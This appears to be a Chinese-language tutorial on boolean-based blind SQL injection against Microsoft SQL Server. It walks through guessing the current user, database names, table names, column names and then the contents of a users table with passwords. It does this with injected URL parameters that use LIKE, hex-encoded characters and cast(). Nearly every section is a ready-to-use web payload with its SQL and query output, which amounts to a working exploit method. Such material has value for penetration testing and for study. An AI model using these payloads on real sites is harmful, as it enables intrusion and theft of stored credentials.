0x01 基本数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x02 注意事项

这里说明推荐一下看一下这个文章,这样就知道各进制转换的结果
https://www.yuque.com/pmiaowu/ppx2er/kfvuhv

  1. # 16进制有两种显示方式
  2. 例如
  3. 转换 1, 2, 3
  4. 如果有查看我上面推荐的文章移到 16进制 那一列
  5. 就可以知道
  6. 1 16进制 = 31
  7. 2 16进制 = 32
  8. 3 16进制 = 33
  9. 那么对比的时候
  10. 第一种: 123 like 0x31 + 0x32 + 0x33 是相等的
  11. 第二种: 123 like 0x313233 是相等的
  12. 这两种方式都是可以的
  13. 其中真实注数据的时候需要注意一点!!!
  14. 那就是要出的数据最好使用 cast()函数 转换成 varchar 类型
  15. 因为使用 like + 16进制 来判断数据的时候,你不转换的话, 有的情况你会发现判断永远等于 False
  16. 例如:
  17. user = dbo
  18. d 16进制 = 64
  19. b 16进制 = 62
  20. o 16进制 = 6F
  21. # 你会发现明明是对的, 但是返回一直是False 这会导致你无法正常注入 如下
  22. 1> select * from article where (user like 0x64626F);
  23. 2> go
  24. +----+-----+--------+
  25. | id | title | content |
  26. +----+-----+--------+
  27. +----+-----+--------+
  28. (0 rows affected)
  29. # 这样你会发现又可以正常注入了, 所以使用该方法记得把数据转换成 varchar 类型 如下
  30. 1> select * from article where (cast((user) as varchar) like 0x64626F);
  31. 2> go
  32. +----+-----------+-----------+
  33. | id | title | content |
  34. +----+-----------+-----------+
  35. | 1 | 测试标题 | 测试内容 |
  36. | 2 | 测试标题2 | 测试内容2 |
  37. +----+-----------+-----------+
  38. (2 rows affected)

0x03 猜当前连接用户

web语句: http://www.test.com/sql.php?id=1 and (cast((user) as varchar) like 0x64+0x6F)

数据库语句: select * from article where id=1 and (cast((user) as varchar) like 0x64+0x6F)

  1. 1> select * from article where id=1 and (cast((user) as varchar) like 0x64+0x6F);
  2. 2> go
  3. +----+----------+----------+
  4. | id | title | content |
  5. +----+----------+----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. +----+----------+----------+
  8. (1 rows affected)
  9. # 等同于
  10. # select * from article where id=1 and (cast((user) as varchar) like '%%');
  1. # 查询当前连接用户长度
  2. # 0x5F = _ (下划线通配符:表示匹配单个字符)
  3. # 对的情况, 表示user长度=3
  4. 1> select * from article where id =1 and (cast((user) as varchar) like 0x25+0x5F+0x5F+0x5F+0x25);
  5. 2> go
  6. +----+-----------+-----------+
  7. | id | title | content |
  8. +----+-----------+-----------+
  9. | 1 | 测试标题 | 测试内容 |
  10. +----+-----------+-----------+
  11. (2 rows affected)
  12. # 等同于
  13. # select * from article where id =1 and (cast((user) as varchar) like '%___%');
  14. # 错误的情况, 表示user长度!=4
  15. 1> select * from article where id =1 and (cast((user) as varchar) like 0x25+0x5F+0x5F+0x5F+0x5F+0x25);
  16. 2> go
  17. +----+-----+--------+
  18. | id | title | content |
  19. +----+-----+--------+
  20. +----+-----+--------+
  21. (0 rows affected)

0x04 猜库名

注意: db_name() 修改会显示其他库名
例如:
修改为db_name() 就是当前连接的库
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?id=1 and (cast((db_name()) as varchar) like 0x25+0x74+0x65+0x25)

数据库语句: select * from article where id=1 and (cast((db_name()) as varchar) like 0x25+0x74+0x65+0x25)

  1. # 查询 db_name() 前两个字符
  2. db_name() = test
  3. t 16进制 = 74
  4. e 16进制 = 65
  5. # 对的情况
  6. 1> select * from article where id=1 and (cast((db_name()) as varchar) like 0x25+0x74+0x65+0x25);
  7. 2> go
  8. +----+-----------+-----------+
  9. | id | title | content |
  10. +----+-----------+-----------+
  11. | 1 | 测试标题 | 测试内容 |
  12. | 2 | 测试标题2 | 测试内容2 |
  13. +----+-----------+-----------+
  14. (2 rows affected)
  15. # 错的情况
  16. 1> select * from article where id=1 and (cast((db_name()) as varchar) like 0x25+0x74+0x61+0x25);
  17. 2> go
  18. +----+-----+--------+
  19. | id | title | content |
  20. +----+-----+--------+
  21. +----+-----+--------+
  22. (0 rows affected)

0x05 猜表名

查询不同的库可以这样

例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects

查询不同的表可以这样
例如:
修改 top 0 id 出表1
修改 top 1 id 出表2

注意:
XType=0x55 表示获取某数据库的所有用户表;
XType=0x53 表示获取某数据库的所有系统表;

web语句: http://www.test.com/sql.php?id=1 and cast(((select top 1 name from test.dbo.sysobjects where id not in(select top 0 id from test.dbo.sysobjects where XType=0x55 order by id) and XType=0x55 order by id)) as varchar) like 0x25+0x75+0x73+0x65+0x72+0x73+0x25

数据库语句: select * from article where id=1 and cast(((select top 1 name from test.dbo.sysobjects where id not in(select top 0 id from test.dbo.sysobjects where XType=0x55 order by id) and XType=0x55 order by id)) as varchar) like 0x25+0x75+0x73+0x65+0x72+0x73+0x25

  1. # 查询库第一张表
  2. 第一张表 = users
  3. %users% = 0x25+0x75+0x73+0x65+0x72+0x73+0x25
  4. 1> SELECT
  5. *
  6. FROM
  7. article
  8. WHERE
  9. id = 1
  10. AND CAST (
  11. (
  12. (
  13. SELECT
  14. TOP 1 name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. id NOT IN (
  19. SELECT
  20. TOP 0 id
  21. FROM
  22. test.dbo.sysobjects
  23. WHERE
  24. XType = 0x55
  25. ORDER BY
  26. id
  27. )
  28. AND XType = 0x55
  29. ORDER BY
  30. id
  31. )
  32. ) AS VARCHAR
  33. ) LIKE 0x25+0x75+0x73+0x65+0x72+0x73+0x25;
  34. 2> go
  35. +----+----------+----------+
  36. | id | title | content |
  37. +----+----------+----------+
  38. | 1 | 测试标题 | 测试内容 |
  39. +----+----------+----------+
  40. (1 rows affected)
  1. # 查询库第二张表
  2. 第二张表 = article
  3. %article% = 0x61+0x72+0x74+0x69+0x63+0x6C+0x65
  4. 1> SELECT
  5. *
  6. FROM
  7. article
  8. WHERE
  9. id = 1
  10. AND CAST (
  11. (
  12. (
  13. SELECT
  14. TOP 1 name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. id NOT IN (
  19. SELECT
  20. TOP 1 id
  21. FROM
  22. test.dbo.sysobjects
  23. WHERE
  24. XType = 0x55
  25. ORDER BY
  26. id
  27. )
  28. AND XType = 0x55
  29. ORDER BY
  30. id
  31. )
  32. ) AS VARCHAR
  33. ) LIKE 0x25+0x61+0x72+0x74+0x69+0x63+0x6C+0x65+0x25;
  34. 2> go
  35. +----+----------+----------+
  36. | id | title | content |
  37. +----+----------+----------+
  38. | 1 | 测试标题 | 测试内容 |
  39. +----+----------+----------+
  40. (1 rows affected)

0x06 猜字段

查询不同的字段可以这样
例如:
修改 top 0 ordinal_position 出字段1
修改 top 1 ordinal_position 出字段2

web语句: http://www.test.com/sql.php?id=1 and (cast((select top 1 column_name from information_schema.columns where ordinal_position not in(select top 0 ordinal_position from information_schema.columns where cast(table_name as varchar) like 0x7573657273 order by ordinal_position) and cast(table_name as varchar) like 0x7573657273 order by ordinal_position) as varchar) like 0x25+0x69+0x25)

数据库语句: select * from article where id=1 and (cast((select top 1 column_name from information_schema.columns where ordinal_position not in(select top 0 ordinal_position from information_schema.columns where cast(table_name as varchar) like 0x7573657273 order by ordinal_position) and cast(table_name as varchar) like 0x7573657273 order by ordinal_position) as varchar) like 0x25+0x69+0x25)

  1. user 第一个字段 = id
  2. # 获取当前库 users表 第一个字段第一个字符
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = 1
  9. AND (
  10. CAST (
  11. (
  12. SELECT
  13. TOP 1 column_name
  14. FROM
  15. information_schema.columns
  16. WHERE
  17. ordinal_position NOT IN (
  18. SELECT
  19. TOP 0 ordinal_position
  20. FROM
  21. information_schema.columns
  22. WHERE
  23. CAST (table_name AS VARCHAR) LIKE 0x7573657273
  24. ORDER BY
  25. ordinal_position
  26. )
  27. AND CAST (table_name AS VARCHAR) LIKE 0x7573657273
  28. ORDER BY
  29. ordinal_position
  30. ) AS VARCHAR
  31. ) LIKE 0x25 + 0x69 + 0x25
  32. );
  33. 2> go
  34. +----+----------+----------+
  35. | id | title | content |
  36. +----+----------+----------+
  37. | 1 | 测试标题 | 测试内容 |
  38. +----+----------+----------+
  39. (1 rows affected)
  40. # 获取当前库 users表 第一个字段 第一与第二个字符
  41. 1> SELECT
  42. *
  43. FROM
  44. article
  45. WHERE
  46. id = 1
  47. AND (
  48. CAST (
  49. (
  50. SELECT
  51. TOP 1 column_name
  52. FROM
  53. information_schema.columns
  54. WHERE
  55. ordinal_position NOT IN (
  56. SELECT
  57. TOP 0 ordinal_position
  58. FROM
  59. information_schema.columns
  60. WHERE
  61. CAST (table_name AS VARCHAR) LIKE 0x7573657273
  62. ORDER BY
  63. ordinal_position
  64. )
  65. AND CAST (table_name AS VARCHAR) LIKE 0x7573657273
  66. ORDER BY
  67. ordinal_position
  68. ) AS VARCHAR
  69. ) LIKE 0x25 + 0x69 + 0x64 + 0x25
  70. );
  71. 2> go
  72. +----+----------+----------+
  73. | id | title | content |
  74. +----+----------+----------+
  75. | 1 | 测试标题 | 测试内容 |
  76. +----+----------+----------+
  77. (1 rows affected)
  1. user 第一个字段 = username
  2. # 获取当前库 users表 第二个字段第一个字符
  3. 1> SELECT
  4. *
  5. FROM
  6. article
  7. WHERE
  8. id = 1
  9. AND (
  10. CAST (
  11. (
  12. SELECT
  13. TOP 1 column_name
  14. FROM
  15. information_schema.columns
  16. WHERE
  17. ordinal_position NOT IN (
  18. SELECT
  19. TOP 1 ordinal_position
  20. FROM
  21. information_schema.columns
  22. WHERE
  23. CAST (table_name AS VARCHAR) LIKE 0x7573657273
  24. ORDER BY
  25. ordinal_position
  26. )
  27. AND CAST (table_name AS VARCHAR) LIKE 0x7573657273
  28. ORDER BY
  29. ordinal_position
  30. ) AS VARCHAR
  31. ) LIKE 0x25 + 0x75 + 0x25
  32. );
  33. 2> go
  34. +----+----------+----------+
  35. | id | title | content |
  36. +----+----------+----------+
  37. | 1 | 测试标题 | 测试内容 |
  38. +----+----------+----------+
  39. (1 rows affected)
  40. # 获取当前库 users表 第一与第二个字符
  41. 1> SELECT
  42. *
  43. FROM
  44. article
  45. WHERE
  46. id = 1
  47. AND (
  48. CAST (
  49. (
  50. SELECT
  51. TOP 1 column_name
  52. FROM
  53. information_schema.columns
  54. WHERE
  55. ordinal_position NOT IN (
  56. SELECT
  57. TOP 1 ordinal_position
  58. FROM
  59. information_schema.columns
  60. WHERE
  61. CAST (table_name AS VARCHAR) LIKE 0x7573657273
  62. ORDER BY
  63. ordinal_position
  64. )
  65. AND CAST (table_name AS VARCHAR) LIKE 0x7573657273
  66. ORDER BY
  67. ordinal_position
  68. ) AS VARCHAR
  69. ) LIKE 0x25 + 0x75 + 0x73 + 0x25
  70. );
  71. 2> go
  72. +----+----------+----------+
  73. | id | title | content |
  74. +----+----------+----------+
  75. | 1 | 测试标题 | 测试内容 |
  76. +----+----------+----------+
  77. (1 rows affected)

0x07 猜内容

查询不同的数据可以这样
例如:
修改 top 0 id 出数据1
修改 top 1 id 出数据2

web语句: http://www.test.com/sql.php?id=1 and (cast((select top 1 id from users where id not in(select top 0 id from users order by id) order by id) as varchar) like 0x25+0x31+0x25)

数据库语句: select * from article where id = 1 and (cast((select top 1 id from users where id not in(select top 0 id from users order by id) order by id) as varchar) like 0x25+0x31+0x25)

  1. # 查询users表 第一条数据, id 字段 第1个字符
  2. id = 1
  3. %1% = 0x25 + 0x31 + 0x25
  4. 1> SELECT
  5. *
  6. FROM
  7. article
  8. WHERE
  9. id = 1
  10. AND (
  11. CAST (
  12. (
  13. SELECT
  14. TOP 1 id
  15. FROM
  16. users
  17. WHERE
  18. id NOT IN (
  19. SELECT
  20. TOP 0 id
  21. FROM
  22. users
  23. ORDER BY
  24. id
  25. )
  26. ORDER BY
  27. id
  28. ) AS VARCHAR
  29. ) LIKE 0x25 + 0x31 + 0x25
  30. );
  31. 2> go
  32. +----+----------+----------+
  33. | id | title | content |
  34. +----+----------+----------+
  35. | 1 | 测试标题 | 测试内容 |
  36. +----+----------+----------+
  37. (1 rows affected)
  1. # 查询users表 第二条数据, username 字段 第1个字符
  2. username = test-user-02
  3. %t% = 0x25 + 0x74 + 0x25
  4. 1> SELECT
  5. *
  6. FROM
  7. article
  8. WHERE
  9. id = 1
  10. AND (
  11. CAST (
  12. (
  13. SELECT
  14. TOP 1 username
  15. FROM
  16. users
  17. WHERE
  18. id NOT IN (
  19. SELECT
  20. TOP 1 id
  21. FROM
  22. users
  23. ORDER BY
  24. id
  25. )
  26. ORDER BY
  27. id
  28. ) AS VARCHAR
  29. ) LIKE 0x25 + 0x74 + 0x25
  30. );
  31. 2> go
  32. +----+----------+----------+
  33. | id | title | content |
  34. +----+----------+----------+
  35. | 1 | 测试标题 | 测试内容 |
  36. +----+----------+----------+
  37. (1 rows affected)
  38. # 查询users表 第二条数据, username 字段 第1与第2个字符
  39. 1> SELECT
  40. *
  41. FROM
  42. article
  43. WHERE
  44. id = 1
  45. AND (
  46. CAST (
  47. (
  48. SELECT
  49. TOP 1 username
  50. FROM
  51. users
  52. WHERE
  53. id NOT IN (
  54. SELECT
  55. TOP 1 id
  56. FROM
  57. users
  58. ORDER BY
  59. id
  60. )
  61. ORDER BY
  62. id
  63. ) AS VARCHAR
  64. ) LIKE 0x25 + 0x74 + 0x65 + 0x25
  65. );
  66. 2> go
  67. +----+----------+----------+
  68. | id | title | content |
  69. +----+----------+----------+
  70. | 1 | 测试标题 | 测试内容 |
  71. +----+----------+----------+
  72. (1 rows affected)